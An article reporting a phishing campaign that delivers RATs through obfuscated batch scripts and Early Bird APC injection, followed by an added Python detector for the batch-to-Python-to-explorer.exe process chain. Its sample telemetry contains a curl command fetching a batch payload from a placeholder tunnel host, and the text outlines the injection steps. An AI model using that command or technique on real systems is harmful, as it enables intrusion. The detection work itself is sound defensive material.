Cybersecurity researchers have uncovered a sophisticated, multi-stage malware operation that uses obfuscated batch scripts as its primary delivery mechanism. Dubbed VOID#GEIST by Securonix Threat Research, the campaign ultimately deploys encrypted payloads for well-known remote access trojans (RATs) such as XWorm, AsyncRAT, and Xeno RAT. The attack chain is designed to mimic legitimate administrative activity: it starts with a batch script, distributed through phishing emails, that is retrieved from a TryCloudflare domain.
The technical execution is notably stealthy. The initial script orchestrates the deployment of a second batch script, stages a legitimate embedded Python runtime, and decrypts encrypted shellcode. That shellcode is then injected directly into memory using Early Bird Asynchronous Procedure Call (APC) injection, targeting separate instances of the "explorer.exe" process. In an Early Bird injection the loader creates the target process in a suspended state, writes the shellcode into it, queues an APC on the primary thread, and resumes the thread, so the payload runs before the process's own entry point and before most user-mode security hooks are in place. Because the decrypted shellcode exists only in memory, the final stage leaves few traces on disk and reduces the opportunities for traditional file-based detection.
Researchers emphasize that this campaign reflects a broader trend where attackers are moving away from standalone executable files. Instead, they are adopting modular, script-based frameworks that blend in with normal system operations. By leveraging batch scripts for orchestration, PowerShell for stealth, and legitimate runtimes for portability, threat actors can operate persistently within a compromised environment without triggering standard security alerts.
The initial infection phase deliberately avoids privilege escalation, operating with the permissions of the logged-in user to maintain a low profile. Each component of the attack appears harmless in isolation, resembling routine administrative tasks, which allows the malware to establish a firm foothold before decrypting and executing its final RAT payloads for full system control.
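The chain described above (a batch script fetched from a TryCloudflare tunnel, a Python runtime staged in a user-writable directory, and explorer.exe instances spawned by the loader for Early Bird APC injection) leaves a recognisable parent/child pattern in process-creation telemetry even though the shellcode itself never touches disk. The following detection logic is an added example written for this page; it is not code from Securonix or from the campaign. The events are constructed for the example and loosely modelled on Sysmon's ProcessCreate fields; the TryCloudflare hostname, the host names, the parent allowlist and the user-writable directory list are all assumptions that would need tuning for a real environment.

```python
"""Heuristic detection of a VOID#GEIST-style batch -> Python -> explorer.exe chain.

Added example (not the campaign's or the researchers' code). Events are constructed
for this example and only loosely resemble Sysmon EventID 1 (ProcessCreate) fields.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str          # full path of the newly created process
    parent_image: str   # full path of the parent process
    command_line: str


# Parents from which explorer.exe is normally started at logon (assumption; tune per environment).
EXPECTED_EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}

# Directories a standard user can write to without elevation (assumption). A Python
# runtime staged here by cmd.exe is unusual in most managed environments.
USER_WRITABLE_DIRS = re.compile(
    r"\\(?:users\\[^\\]+\\(?:appdata\\local\\temp|downloads)|programdata|users\\public)\\",
    re.IGNORECASE,
)

# Quick-tunnel hostnames all end in .trycloudflare.com; the subdomain is random per tunnel.
TRYCLOUDFLARE_URL = re.compile(r"https?://[\w.-]+\.trycloudflare\.com/", re.IGNORECASE)

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (no pathlib: the detector may run on Linux)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every indicator a single event matches (empty if none)."""
    hits: list[str] = []
    image, parent = basename(ev.image), basename(ev.parent_image)

    # Stage 1: anything pulling content from a TryCloudflare quick tunnel.
    if TRYCLOUDFLARE_URL.search(ev.command_line):
        hits.append("trycloudflare_download")

    # Stage 2: an embedded Python runtime launched by a script host from a user-writable path.
    if image in {"python.exe", "pythonw.exe"} and parent in SCRIPT_HOSTS \
            and USER_WRITABLE_DIRS.search(ev.image):
        hits.append("staged_python_runtime")

    # Stage 3: explorer.exe created by something other than the logon chain. Early Bird
    # APC injection needs a freshly created, suspended process, so the loader becomes
    # the parent of the explorer.exe instance it targets.
    if image == "explorer.exe" and parent not in EXPECTED_EXPLORER_PARENTS:
        hits.append("unexpected_explorer_parent")

    return hits


def correlate(events: list[ProcEvent], min_distinct: int = 2) -> dict[str, list[str]]:
    """Group indicators per host and report hosts that show at least `min_distinct` stages.

    Each indicator alone is noisy (developers run Python from odd places); requiring two or
    more distinct stages on the same host is what separates the chain from routine admin work.
    """
    per_host: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        per_host[ev.host].update(classify(ev))
    return {host: sorted(h) for host, h in per_host.items() if len(h) >= min_distinct}


# Constructed sample telemetry (invented hosts, paths and tunnel hostname).
SAMPLE_EVENTS = [
    ProcEvent("WS-01", r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe",
              r"curl.exe -s https://example-words.trycloudflare.com/update.bat -o %TEMP%\update.bat"),
    ProcEvent("WS-01", r"C:\Users\alice\AppData\Local\Temp\py\pythonw.exe",
              r"C:\Windows\System32\cmd.exe", "pythonw.exe loader.py"),
    ProcEvent("WS-01", r"C:\Windows\explorer.exe",
              r"C:\Users\alice\AppData\Local\Temp\py\pythonw.exe", r"C:\Windows\explorer.exe"),
    # Benign baseline on a second host: normal logon chain and a developer's Python install.
    ProcEvent("WS-02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe",
              r"C:\Windows\explorer.exe"),
    ProcEvent("WS-02", r"C:\Program Files\Python312\python.exe", r"C:\Windows\System32\cmd.exe",
              "python.exe build.py"),
]


if __name__ == "__main__":
    for host, indicators in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(indicators)}")
```

Two caveats worth keeping in mind when turning this into a production rule. First, Early Bird APC injection queues the payload with QueueUserAPC on the suspended process's own thread rather than creating a remote thread, so a detection keyed on CreateRemoteThread events (Sysmon EventID 8) will not see it; the parent/child anomaly on explorer.exe, plus any ProcessAccess or memory-write telemetry your EDR exposes, is the better hook. Second, because the chain runs as the logged-in user, none of these events carry an elevation or UAC signal, which is exactly why correlating several low-severity stages per host matters more than any single indicator.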